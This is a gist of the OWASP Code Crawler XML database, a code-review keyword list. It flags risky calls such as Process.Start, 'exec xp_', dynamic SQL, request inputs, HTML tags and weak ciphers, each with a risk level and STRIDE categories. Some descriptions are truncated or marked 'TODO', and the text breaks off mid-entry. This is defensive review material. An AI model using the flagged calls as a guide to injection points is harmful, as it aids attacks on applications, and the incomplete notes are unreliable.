Skip to content

Instantly share code, notes, and snippets.

@boyter

boyter/CodeCrawlerDatabase.xml

Created July 8, 2016 06:35
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save boyter/31f8226abdefaf723c987bdb6d8ea7f3 to your computer and use it in GitHub Desktop.
Save boyter/31f8226abdefaf723c987bdb6d8ea7f3 to your computer and use it in GitHub Desktop.
Download ZIP
OWASP Code Crawler Database
Raw
CodeCrawlerDatabase.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
Project : OWASP Code Crawler
Company : Open Web Application Security Project
Developer: Tripurari Rai / Alessio Marziali
Last Update : 05 25 2008
-->
<CodeCrawlerDatabase>
<KeyPointer>
<k_name>Trace.Warn</k_name>
<k_level>3</k_level>
<k_description>Trace shoud be disabled in production enviroment. And should be used only for debugging. Ensure you are not providing sensitive informations.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Diagnostic.Process.Start</k_name>
<k_level>3</k_level>
<k_description>This k_name may be vulnerable to command injection attacks or OS injection attacks. Java linking to the native OS can cause serious issues and potentially give rise to total server compromise.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>delete</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>exec sp_executesql</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>delete from where</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>exec sp_</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>exec xp_</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>exec @</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>executestatement</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>executeSQL</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>driver</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;meta&gt;</k_name>
<k_level>3</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.certificate</k_name>
<k_level>3</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.cookie</k_name>
<k_level>3</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.form</k_name>
<k_level>3</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>request.querystring</k_name>
<k_level>3</k_level>
<k_description>Requests from external sources are obviously a key area of a secure code review. We</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Statement.executeQuery</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Statement.executeUpdate</k_name>
<k_level>3</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.servlet.jsp.JspWriter.print</k_name>
<k_level>3</k_level>
<k_description>Can lead to Cross site Scripting</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.servlet.ServletOutputStream.print</k_name>
<k_level>3</k_level>
<k_description>Can lead to Cross Site Scripting</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.servlet.http.Cookie</k_name>
<k_level>3</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.servlet.</k_name>
<k_level>3</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;body&gt;</k_name>
<k_level>3</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;object&gt;</k_name>
<k_level>3</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>DataSource</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>New OleDbConnection</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ADODB.recordset</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>.Open</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>.Provider</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Server.CreateObject</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ReflectionPermission.MemberAccess</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>sql server</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>sqloledb</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>adodb</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>GetQueryResultInXML</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>enableViewState</k_name>
<k_level>2</k_level>
<k_description>It is important that many variables in machine.config can be overridden in the web.config file for a particular application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>setfilter</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SqlCommand</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Microsoft.Jet</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SqlDataReader</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>GetString</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SqlDataAdapter</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>CommandType</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>StoredProcedure</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Data.Sql</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;applet&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>RC2</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Random</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Random</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Security.Cryptography</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;ilayer&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
